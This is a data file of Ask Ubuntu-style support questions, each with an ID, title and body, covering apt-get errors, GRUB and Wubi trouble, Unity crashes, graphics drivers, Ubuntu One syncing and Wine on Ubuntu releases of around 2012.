183530	how to lock yourself out of the primary account temporarily ?	i 'm looking for something like leechblock , or stayfocusd on steroids , i.e . something that could block my internet access temporarily , but do it in a way that would be a major hassle to disable , unlike these browser plug-ins ( a `` major hassle '' is something like re-installing the os ) if i create a `` restricted '' account , block its internet access and exclude it from sudoers , it would work for me , but only if i could somehow lock myself out of my primary account on the machine , temporarily . can this be done in ubuntu ? ( i 'm sticking with 11.04 , but i would consider upgrading or paying for this feature ) simply letting someone else be the admin of my machine is not an acceptable solution for me . something like a cron job temporarily resetting the password might do the job , but it would have to be something very reliable , obviously . i ca n't risk being permanently locked out , because the machine had to reboot , etc . i also asked a more general version of this question , in productivity.se .
183533	sharing subfolders with ubuntu one	is it possible to share subfolders with ubuntu one ? say , if your documents in one folder are put into author folders - can i just share `` root '' document folder and other account can download all subfolders ? or do i need to share each subfolders separately ?
183537	devanagari characters do not render properly in gvim	devnagari characters do not render properly in gvim . they appear just as they do when typed in vim running in a terminal ( consonants and vowels separated . ) is there any way we can make vim handle devnagari characters properly ?
183539	error in transfer data to a pen usb	when i try to transfer data to a pen usb in ubuntu 12.04 , the system give me error . the pen is formated in fat32 . sorry the english and thank you for any help .
183544	link windows xampp htdocs dir with linux www dir	i 'm migrating from windows to ubuntu . i 've installed apache on ubuntu . it keeps files in /var/www/ folder . when i was on windows , i 've had used xampp , which keeps files in /xampp/htdocs/ . so i do n't have my projects on ubuntu , and i should copy them from windows htdocs to www directory . it 's easy for once time.. but if i edit a project in ubuntu , it wo n't be accessible on windows.. ( i mean i want to have 1 folder for xampp htdocs on windows and www folder on ubuntu , and keep them the same and updated ) i 've created a link to htdocs folder and put it in www folder , but when the browser point to `` http : //localhost/windows_htdocs '' , it says : 403 forbidden should i change permission of all directories and files in xampp htdocs folder to solve the problem ? it does n't cause any problems for my windows ? although , i 've tried to change the permission of a folder in the htdocs directory by chmod command , but it did n't take effect , and permission did n't changed ...
183550	removing multiple files ubuntu one	i have 50 or 60 rogue files on ubuntu one that i wish to delete . is there a way to do multiple files at once ? using the ctrl key does n't do the trick . additionally , when trying to delete them one at a time , the delete option is hidden by the file below .
183551	how to uninstall wubi installed in e drive ?	i am having ubuntu installed in my e drive ( note : not c drive ) for over a year while i use window 7 . for some reason , i want to format e drive , so i feel the need to uninstall ubuntu first . the problem is that the option neither appears in control panel nor is the uninstall-wubi.exe doing anything . so help me to uninstall ubuntu completely , manually . also i do n't want the option for selecting between windows 7 and ubuntu at boot time once i uninstall it .
183553	can ubuntu unzip from inside a dialog ?	windows can unzip files from inside a dialog , which is convenient if files are zipped and you want to unzip . can ubuntu do this ? if so , how ? if not , why not ?
183555	can not update packages in ubuntu 11.10	unable to do update for ubuntu 11.10 . this is the error message am getting on my pc : root @ ravi-desktop : /home/ravi # sudo apt-get update reading package lists ... done w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems root @ ravi-desktop : /home/ravi # sudo apt-get update fetched 72.3 kb in 1min 26s ( 836 b/s ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . root @ ravi-desktop : /home/ravi # below is the error am getting : ravi @ ravi-desktop : ~ $ su password : root @ ravi-desktop : /home/ravi # gedit ( gedit:2424 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported ** ( gedit:2424 ) : warning ** : could not connect to session bus root @ ravi-desktop : /home/ravi #
183558	apt-get errors after tex live 2012 update with tlmgr	i am running tex live 2012 on ubuntu precise . for the installation i followed this tutorial . yesterday , i updated the packages ( about 40 items ) for tex live 2012 using the following tool . $ sudo tlmgr -- gui the updates have been installed successfully and everything still worked . today , i noticed that apt-get outputs errors when i run sudo apt-get install something or sudo apt-get autoremove . here is the console output of the latter command . $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up texlive-base ( 2009-15 ) ... mktexlsr : updating /var/lib/texmf/ls-r-texmfmain ... mktexlsr : updating /var/lib/texmf/ls-r-texlive ... mktexlsr : updating /var/lib/texmf/ls-r ... mktexlsr : done . texconfig : unknown option `paperconf ' given as argument for `texconfig dvips' texconfig : try `texconfig dvips ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig dvipdfmx' texconfig : try `texconfig dvipdfmx ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig xdvi' texconfig : try `texconfig xdvi ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig pdftex' texconfig : try `texconfig pdftex ' for help texconfig : unknown option `paperconf ' given as argument for `texconfig dvips' texconfig : try `texconfig dvips ' for help dpkg : error processing texlive-base ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of texlive-latex-base : texlive-latex-base depends on texlive-base ( > = 2009-1 ) ; however : package texlive-base is not configured yet . dpkg : error processing texlive-latex-base ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-bibtex-extra : texlive-bibtex-extra depends on texlive-latex-base ( > = 2009-1 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing texlive-bibtex-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : texlive-base texlive-latex-base texlive-bibtex-extra latex itself still works fine as far as i can see . note : just in case the following has something to do with the main problem . i also noticed a while ago that the man path does no longer point to the usual folders . the manpath problem has been described before . however , i could not solve it on my machine . $ echo $ manpath /usr/local/texlive/2012/texmf/doc/man
183559	uninstall ubuntu 12.04 from my win7	is it safe to uninstall ubuntu from my windows 7 computer ? my default os is now ubuntu and ca n't change it to windows 7 . i am just bored of ubuntu which lowers my battery life quicker than windows .
183561	how to zoom desktop without compiz ?	first off i am visually impaired and i have used various windows-based screen zooming applications . compiz advanced desktop zoom is fantastic but it totally murders my wine applications . turning off desktop effects makes them work 100 % perfect , but of course i now have no zoom . so question is , can i zoom without compiz ? is there any third party application for the job ? e.g qzoom in windows . i am running ubuntu 12.04 .
183564	high contrast theme firefox problem	i am using the high contrast inverse theme in 12.04 as i am visually impaired . this generally works great but causes a problem in firefox as entered text e.g into a google search is white . as the text background is also white you can not see what you are typing . i have read through a good thirty websites with similar issues but thus far nothing works . i have tried all the settings in firefox like un-checking `` use system defaults '' as well as manually telling firefox what colours to use and these setting have absolutely no effect on anything .
183569	reboot from windows causes infinte reboot cycle - from ubuntu it 's fine ?	i installed ubuntu on a laptop with custom windows xp installed . it reboots fine and launches ubuntu and everything works . when i reboot from windows though , the grub menu is gone . the computer starts going in to this weird reboot cycle , where i see the bios screen then it goes black . after that , i see the bios screen again and this repeats . the only solution is to reinstall ubuntu . then i get the grub menu back and i can go into windows but the same thing happens on reboot from windows .
183570	where can i find dictionaries for opendict and goldendict ?	asking about good offline dictionaries in ubuntu would have created a duplicate of this question which got as answers only goldendict and artha . artha is ok but is limited to english as far as i can tell . i would like at least some more english and french dictionaries . i have also installed opendict but it asks to add dictionaries . how to do it ? many users recommend goldendict , which comes with wikipedia and to which i could add an english dictionary , but for dictionary sources we are redirected to an almost dead website : most of links are dead and/or in russian . i can not download any dictionaries from babylon as they just give a link to download babylon.exe no matter what `` free-dictionary '' i choose . i have extracted the exe file but no .bgl files inside ( what am i missing here ? ) .
183574	mouse and mousepad not working properly	ubuntu 12.04 lts samsung q35 the mouse pad has stopped working , only the buttons work . the external mouse is also behaving very oddly , the mouse pointer works , but the button is not working properly , it has to be pressed many times or held down to select anything , and when anything that i select behaves as though the mouse is being clicked all the screen , settings will keep changing , the page will scroll , sliders will move up and down , tabs will toggle etc , so everything is unusable with the mouse , can not even use the browser as it keeps scrolling the page up and down . i have tested the mouse on another computer , and it works fine . please bear in mind that i am also a complete linux novice , i installed ubuntu on an old laptop for my kids , that is the limit of my experience .
183576	what would be a good partitioning scheme for 128 gb ssd and 640 gb hdd	i have a combination of 128 gb ssd and a 640 gb hdd . i 'm planning to install xubuntu 12.04 on it . i have read some question here ( like what 's a good partition method to combine an ssd boot drive with a 1tb data drive ? ) and most basic partitioning scheme should look like : / on ssd /home on hdd i do n't plan making /swap because i have 8 gb of ram ( or should i ? ) . is there a point on making separate /boot partition on ssd ? would i benefit from butting something more on ssd ? there are some suggestions to but programs you use most to ssd to speed things up . should there be a separate partition for this ? would it be good idea to install virtual machines to ssd ? if i want to reinstall rather than upgrade should i make a separate partition for user files so i could overwrite /home ? if yes , how big should /home be ?
183579	how to get the ubuntu-dictionary in lubuntu ?	it seems that ubuntu-desktop comes with a dictionary . what is that and how to get that in lubuntu ?
183582	upgrading ubuntu from local mirror	i need to upgrade from ubuntu server 10.04 lts to 12.04 lts using local repository ( approx ) ; internet access is granted by a web proxy . the problem is : if i do n't set proxy ( so server ca n't reach internet ) , it says : # do-release-upgrade checking for a new ubuntu release failed upgrade tool signature failed upgrade tool done downloading failed to fetch fetching the upgrade failed . there may be a network problem . if i set proxy , it ca n't reach local repositories : # export https_proxy= '' http : //user : password @ proxy.localdomain:8080 '' # export http_proxy= '' http : //user : password @ proxy.localdomain:8080 '' ... # do-release-upgrade ... err http : //apt.localdomain precise/main packages 503 service unavailable err http : //apt.localdomain precise/restricted packages 503 service unavailable err http : //apt.localdomain precise/universe packages 503 service unavailable err http : //apt.localdomain precise/multiverse packages 503 service unavailable err http : //apt.localdomain precise/main sources 503 service unavailable err http : //apt.localdomain precise/restricted sources 503 service unavailable err http : //apt.localdomain precise/universe sources 503 service unavailable err http : //apt.localdomain precise/multiverse sources 503 service unavailable err http : //apt.localdomain precise-updates/main packages 503 service unavailable ... any ideas ?
183583	change icons in the unity launcher	how can i change the icons in the launcher ? for example , i run trollian ( pesterchum ) under wine , and now i have removed the desktop shortcut , the launcher icon is jusy the wine one . how can i change it to the trollian icon ? i currently have it set to this , but i would like to do it without keeping a desktop shortcut .
183590	mergelist error when updating 12.04	i have this error in updating ubuntu 12.04 e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-amd64_packages , e : the package lists or status file could not be parsed or opened .
183596	how to extract spider.exe file from xp cd	i am new to ubuntu ( have 10.04 only installed , no dual system ) , and i wish to add the xp version of spider solitaire to wine . i have an old xp installation cd . what is the procedure for extracting the spider.exe file from the cd ?
183597	i ca n't connect to any network	when i plug in the ethernet , 'connection 1 ' shows under connections , and when i click it , it tries to connect for a while then says 'connection 1 : disconnected ' . my best guess is that i need to install some kind of driver , but i ca n't without internet . i 'm on a dell inspiron 1501 , using ubuntu 12.04 . btw , it worked with an older version of the operating system .
183598	how do i find projects in specific source language in launchpad translations ?	i want to participate in launchpad translations . i 'm an expert in spanish and german . is it somehow possible to find projects that are originally written in either spanish or german and have to be translated first into english or any other language ?
183599	how do i mount a .cue/.wav	i have a .cue file which points to a .flac how can i mount the image as if it were an audio cd ? is it necessary to decode the .flac file into .wav and edit the cue sheet to point to a .wav file instead ( it currently points to the flac ) ? i want to use abcde to split , tag , and encode the audio . answers i 've found on here already discuss .cue/.bin combo , not audio images..
183601	ca n't boot , no grub , `` alloc magic is broken ''	i can not boot into grub , i can see this alloc magic is broken at xxxxxx press any key but when i do nothing happens . holding shift does n't do anything also . the last time i could use my machine i changed stuff in the /etc/grub.d but i chroot into the system , reverted everything and successfully ran update-grub . any help appreciated . if anyone wondering : ubuntu 12.04.1 , installation media was ( i guess ) 11.10 , it 's an i5-first generation kernel , 4gb ram , memtest was okay .
183604	'your system is running in low-graphic mode ' after installing amd fglrx drivers on a 6600m	looks like i have a problem that has already been debated but non of the solutions provided did not work for me , so i 'm asking this question again in hpes that someone can help me . i 'm running 12.04 64 bit version on lenovo e520 with amd radeon hd 6600m and intel hd graphic . i was using catalyst 12.6 driver downloaded and installed from http : //support.amd.com/us/gpudownload/windows/previous/12/pages/radeon_linux.aspx ? os=linux % 20x86 & rev=12.6 . however my system unexpectedly crashed with the `` your system is running in low graphic card error '' . since than i 've removed the old ati driver and installed the 12.8 version following their instructions with no problems , however the error still remains . if i use open source drivers i can use ubuntu , but it slow to the point i ca n't even use gnome 3 . previous solutions described do not work for me : your system is running in low-graphics mode with an ati radeon 3200 graphics card any help ?
183608	gksudo 2 commands with one pw entry ?	before upgrading to 12.04 ( from 10.04 ) i used this little launcher script : # ! /bin/bash gksudo nautilus /var/www/dfdii & sleep 5 ; gksudo gedit /var/www/dfdii/iindex.php this script opened both nautilus and gedit with just one pw entry , now it asks for pw twice ? also , annoyingly , now gedit also open `` untitled document 1 '' ( close > save changes ? nooooo ! ...
183619	how do i fix broken packages in 12.04 ?	i am trying to install the nautilus-actions-extra package via synaptic . when i do synaptic advises me that i have broken packages . i have followed how do i locate and remove broken packages that i have installed ? but when i select the status category , i do not have a 'broken dependencies ' option . when i click on the 'broken ' item in the filter category nothing is displayed . i am using ubuntu 12.04lts . what can i do to resolve this ? these are my terminal responses : $ sudo apt-get install nautilus-actions-extra reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . nautilus-actions-extra : depends : nautilus-gksu but it is not installable e : unable to correct problems , you have held broken packages . $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done
183621	apache virtual host on ubuntu 12.04	i have been trying to setup virtual host on apache2 . most of the answers i have seen have been including steps which include uncommenting the include line in httpd.conf , but my httpd.conf file is empty . i installed my apache by using `` sudo apt-get install apache2 '' .
183626	problem opening eclipse	i 'm having a problem loading eclipise in 12.04 . i loaded the error log and this was inside : ! session 2012-09-03 16:52:09.742 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_07 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_gb command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-09-03 16:52:11.317 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/marcel/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/marcel/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( unknown source ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( unknown source ) at java.lang.reflect.method.invoke ( unknown source ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 ) i had openjdk installed and to remove and replace with oracle java to install aptana studio . this thread explains it all . so now reinstalled openjdk , this might give some insight to the problem ?
183629	after installing 12.04.1 i have no gui ?	i installed 12.04.1 and installation seemed to go fine . but now i have no gui . my screen shows the following : bob @ bob-desktop : '' $
183630	ubuntu wo n't run	so i just installed it last night , the latest version . i did a fresh install . when i woke this morning i turn on the computer and login . it goes to a black screen with two thick with/multicolored lines towards the bottom and freezes . i then must shut down the tower . i have only been able to run the 'ubuntu 2d ' option . i am new to this all and need some help . also when i am using terminal it wants me to enter my password , but it says its incorrect . is there anyway so i do n't need to enter my password when i use it and also when i install or remove something ? many thanks would be helpful . what is ubuntu 2d ?
183636	ubuntu one downloads already existing files	i 've uploaded some files to ubuntu one from my home laptop and begin to download it on my work laptop . then i 've got a usb and copied these files directly through the usb driver . my problem now is that ubuntu one still downloading these files although i 've copied them to ubuntu one folder . i need it to consider the already existing files as synced and do n't download it again . and i need ubuntu one for further use so i ca n't simply quit it . how could i mark the already existing files as synced ?
183638	how to run mmdm ( dex game mounter ) windows application in wine ?	i am trying to run / install mmdm dex game mounter ( for windows ) in 12.04 . here is a link to the application . ( there are two applications , but multiman is for the ps3 ) dex game mounter + multiman trying to run the .exe in wine does nothing at all .
183640	which one consume less battery in ubuntu ( generally linux ) ethernet cable or wireless ?	i am wondering when i want to connect to network , it is better use my wireless adapter or using cable ( ethernet adapter ) , which one consume less battery ? sometimes i saw that my battery life was more when i used wireless adapter ! has anyone any technical knowledge about this concern ? thanks in advance .
183641	why do n't popular programs like photoshop or world of warcraft support ubuntu ?	the only thing stopping me from making ubuntu 12.04 my main os is that a lot of programs i use on windows 7 and mac are n't available for download on ubuntu . why do n't popular programs like photoshop or world of warcraft support linux ? also , would a company have to create the program ( eg : photoshop ) for every possible distro ( gentoo , arch linux , ubuntu , etc ... ) , or would they just have to make one binary and it would work across all distros ?
183649	double thumbnails after adding custom wallpapers to /usr/share/backgrounds	i have followed the advice in various posts to this forum on how to get 12.04 to display my own wallpapers in /usr/share/backgrounds . none worked i have subsequently established that 12.04 uses file precise-wallpapers.xml to read its ' wallpapers . this file is locacted in /usr/share/gnome-background-properties . i have added mine to this file . my issue is that when i right click and select 'change background ' i now have two thumbnails for my wallpapers . does anyone know why this is happening and how to fix it ?
183652	i ca n't find or run downloaded geogebra	i ca n't find it . i ca n't run it . i have no idea what to do now that it 's on my computer . i 'm new at this stuff .
183657	adobe flash player being glitchy	this problem has only been happening for the last week . whenever i watch a video ( online ) thats run with flash player , or play a flash game , it 's really glitchy . can someone please help me with this problem ?
183660	frequent crashes on fresh ubuntu 12.04	since the very beginning after i installed ubuntu 12.04 , it has been experiencing random crashes . sometimes it 's the disk-utility , sometimes the qbittorrent , sometimes x11 , other times it 's apport , and many a times it 's compiz . probing further on the crash , sometimes i get a message that some of my packages are out of date , which i update but some of them are already to the latest version . any fixes for this issue ?
183669	will mate ever be in the official repos ?	i was wondering if mate will ever show up in the official repos and be installable without the ppa ?
183672	apt-get problem while installing , removing and updating	i tried to install zte 's software for mobile broadband but it got error while installing itself . now i was ok with the network-manager which itself detects my usb modem . but , everytime while installing or removing or updating , i 'm seeing this . actually here , i 'm trying to remove crossplatformui which is part of zte : software : sudo apt-get -- purge remove crossplatformui reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : crossplatformui 0 upgraded , 0 newly installed , 1 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 480896 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anyone help me how to remove that crossplatform ? and can anyone give me a simple idea to auto reconnect my usb modem to internet ?
183673	unity shortcut causes unwanted reboot	i am running ms word ( office 2010 ) in win 7 in a virtualbox vm . host os is ubuntu 12.04 running unity . all works reasonably well , except , there is a keystroke combination in word to `` paste special '' , and it is invoked by alt + e + s + enter . good for pasting text without carrying in any formatting from the source text . several times i have gone to do that in haste . on occasion , however , instead of word pasting the clipboard into the open word doc , unity grabs these keystrokes and immediately forces some kind of hardware reset or reboot ! very disturbing when this happens , very unexpected and ungraceful sudden exit from everything . i do n't see any such key combination documented for unity , and in any case , i 'd like to be able to turn of all or selected unity shortcuts , but have n't seen how to do that either .
183675	how to forcefully delete files ( system files )	i have a memory card ( ms-dos file system i believe ) which i want to delete all the files in it . even though i use sudo rm -fr * i still get read-only file system for the files in the memory card folder . how do i remove all the files ? ( or maybe just format it ? )
183676	how to override some key bindings using quickly	i am developing a native application for ubuntu using quickly . how can i disable few key bindings such as prevent ctrl + f4 from closing the window , and other key combinations ?
183677	problem upgrading 11.10 server to 12.04 lts	i 'm experiencing some problems with upgrading ubuntu 11.10 server to 12.04 lts i have changed the release-upgrades files to prompt=lts but the do-release-upgrade -d does n't work . how can i fix that ? i 'm really interested to do this upgrade . additional information lsb-release file distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' uname -a linux v-5477 2.6.18-238.12.1.el5.028stab091.1 # 1 smp wed jun 1 13:20:25 msd 2011 x86_64 x86_64 x86_64 gnu/linux
183682	unity launchers and bar disappeared and unity -- reset shows an error	i am having a problem with unity . i have launched movie player with qnapi ( application for downloading movie subtitles ) and somehow unity crashed and disappeared leaving just the opened windows without the launchers , title bars and unity 's top bar . after i go to ctrl + alt + f1 and try to unity -- reset i get this error unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1600004 compiz ( core ) - warn : failed to receive configurenotify event on 0x3a000c7 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:27639 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed error 2012-09-03 19:04:45 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0x2a0009f ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x2a000a2 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x2a000a2 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . segmentation fault ( core dumped ) warning : unity currently default profile , so switching to metacity while resetting the values what can i do ( besides reboot ) ? edit launching unity panel from compiz did n't help either .
183684	going back to gnome	i want to know if i can go back to a 10.04 style gnome environment . by 10.04 environment , i mean the ability to add icons and little applets , like drawer , on the top menu bar . right now , after all i have tried , it does not seem possible . so , i am not stuck on using 10.04 , but am using 10.04 as an example of things i liked and am wondering how to get them back . is this a straightforward thing to do , or more painful than it is worth ? if i go back to gnome , am i going to suffer on the next lts upgrade ? right now , i have the basic 12.04 environment , with gnome installed -- sudo apt-get install gnome-panel -- but i found i could not go back up to the top menu and put in my familiar drawers and other installed icons . i tried both gnome settings , one less graphically intensive than the other . as a matter of fact , unity seemed to be better just because i could get to the few installed icons that the upgrade picked off my old gnome menu . thanks .
183686	increase tab font size in chromium ?	is there any way to do this ? the font is insanely poor and small . attached screenshot : i 'm using 1920 x 1080 as native screen resolution .
183687	cycles through black screen on login after changing password	on my laptop , i forgot the password to my ubuntu partition , so i logged into the root command shell on the recovery start up option in grub so that i could change the password . on my first attempt to change my user password , i got this error : root @ username-pc : ~ # passwd username ( *not my actual user name* ) enter new unix password : retype new unix password : passwd : authentication token manipulation error passwd : password unchanged after doing some research , i discovered that i was stuck as read only on the file system , so i ran the following command to remount the file partition as read/write : mount -rw -o remount / afterwards , i change my user password using passwd and it was changed successfully . i restarted my laptop and tried to login using the new password but the only thing that happened was after entering my password it flashed to a black screen with some text that i could n't make out except for `` ubuntu 12.04 '' then another black screen half a second later , and finally back to the login screen . repeated attempts to login results in only this action .
183690	why has libreoffice stopped being visible in unity	in the past few days , libreoffice has stopped playing nicely with unity . when i have any of its components running , the icons in the taskbar do n't have arrows next to them , and alt-tab does n't show or allow access to any libreoffice windows that i have open ( but i can click them to bring them to the front ) . this behaviour has changed just recently , and as far as i 'm aware , nothing has changed on my system for the past few weeks other than installing recommended updates as normal . anyone else seen this ?
183691	chrome fails to clear the thumbnails	i am using google chrome version 21.0.1180.89 ( on ubuntu 12.04 ) and when i clear the browsing data it fails to clear the thumbnails ( the most visited ones that show up on a new tab page ) . i deleted `` top sites '' and `` top sites-journal '' ( under ~/.config/google-chrome/default path ) but this did not clear out the thumbnails . i am not even sure whether chrome actually counts the visit number on pages correctly or not anymore .
183693	i have disabled unity plugin in `` ccsm '' when turning off expo . how can i recover it ?	common left panel ( launcher ) is disable too . i think i should reset settings . how can i do it ? ps i can start terminal .
183705	ubuntu 12.04 uefi dualboot win7	i have new laptop asus n76 with 500gb hdd and 256 ssd . windows 7 is installed on hdd with partitions : /dev/sda1 fat32 200mb boot ( gpt ) /dev/sda2 unknown 128mb msftres /dev/sda3 ntfs 94gb ( win 7 ) /dev/sda4 ntfs 20gb hidden , diag i want to install 12.04 on ssd disk . is it possible to install grub2 at /dev/sda1 partition ? is ubuntu installer ready for that ? is there some configuration for grub2 to setup boot path for windows 7 ( hdd ) and ubuntu 12.04 ( ssd ) ?
183708	how do i have my gtk+3 theme look different in certain applications ?	if i want my gtk+3 theme that i 'm writing to theme certain ui elements in some applications a bit differently than for most applications , how would i go about doing that ? for example , i might have a gtk+3 theme which specifies round buttons in most applications , but in calculator ( gcalctool ) i want square buttons instead . how do i find out how to refer to these applications ' ui elements in my theme 's css files ?
183709	how to make hotot autologin and minimize on start ?	every restart i have to click 'sign in with twitter ' to log in my twitter account . i read somewhere that it is possible to log in automatically but ca n't find out how .
183710	how do i configure my wireless settings for a particular network if all i have are instructions for windows ?	i 've been trying to connect to my university 's secure wireless network , unfortunately they only provide instructions for windows users here . i 've tried to use the info on these instructions as best i can but i have not been successful . in particular , i think the problem might be with the certificate part . i am using ubuntu 12.04 . i appreciate any help !
183711	google calendar as default handler of webcal protocol for ical/ics files	i would like for google calendar to open uris with the webcal ( wikipedia ) scheme ( delivering ics files ) , similar to how gmail can be set to be the default handler for mailto : links . more specifically , i would like for google calendar to import them to my primary calendar . ( you can manually import an ics file in google calendar by clicking the small arrow next to other calendars , choosing import calendar from the drop-down list , navigating to the .ics file , and choosing import . ) i do n't know if this is possible , but i 'm hoping somebody will have a great idea .
183712	limiting what resumes computer from suspend	i 'm having a ton of trouble getting suspend to work with my laptop . i want to start using ubuntu but this is a pretty important aspect since i take my laptop with me everywhere . anyways , i wanted to narrow down the possible problem with my laptop . what happens is that when i suspend my computer , within seconds , it just boots back up . i have changed /proc/acpi/wakeup to where everything is disabled but that did nothing . is there a way where i can disable every feature from waking up the laptop except the power button ?
183718	error installing grub	i 'm in the process of reinstalling ubuntu overwriting the previous os because it would n't boot after updates . i 'm doing it using a usb stick . half way through the install it shows a message with the following error : it 's not possible to install grub at /dev/sdb ; grub-install/dev/sdb failed . this is a fatal error . i think its trying to install it onto the usb stick ( sdb ) ? i then have the option to chose another device to install the bootloader to /dev/sda ata st320lto12-9ws14 ( 320.1gb ) or to /dev/sda1 . there is also an option to continue without installing the bootloader or to cancel the installation . this is my first experience with linux and ubuntu ! this is a link to first question i asked to try to solve the first problem with ubuntu not booting properly but that got to a dead end ! ubuntu not booting properly it has all the steps i took to get to this point . thanks .
183720	how do i install mosml ?	i need to get mosml ( moskow sml ) on to my system for university . i never installed anything that was n't in the software manager or using wine ( read : my console skills are low ) . the package is here : http : //packages.ubuntu.com/hardy/mosml thing is , i have n't got a clue what to do with it . so far : tried the mosml.static ( a stand-alone toplevel ( mosml ) ) did n't really know what to do with it . tried the source files , extracted them and looked in the install.txt , but i do n't get the /bin folder and so it seems to be a dead-end.. ? ? please help if you have a clue . i really need it and its quite urgent .
183721	virtual memory exhausted while using wine	i have two machines - a laptop and a desktop , both running pangolin . wine works fine on laptop , but it does n't work at all on my desktop . it was working until a couple of days ago , but has stopped working since then . every time i try to run wine , i get `` virtual memory exhausted '' error . i googled around a bit , and came across two suggestions : removing `` .wine '' directory from home . adding the current user to `` audio '' group . i tried both , but neither fixes the problem for me . please help .
183723	whats the difference between unix , linux and ubuntu ?	what is unix , linux , ubuntu ? are they the same thing or different versions or completely different stuff ? this has always made me confused , any explanation would be great .
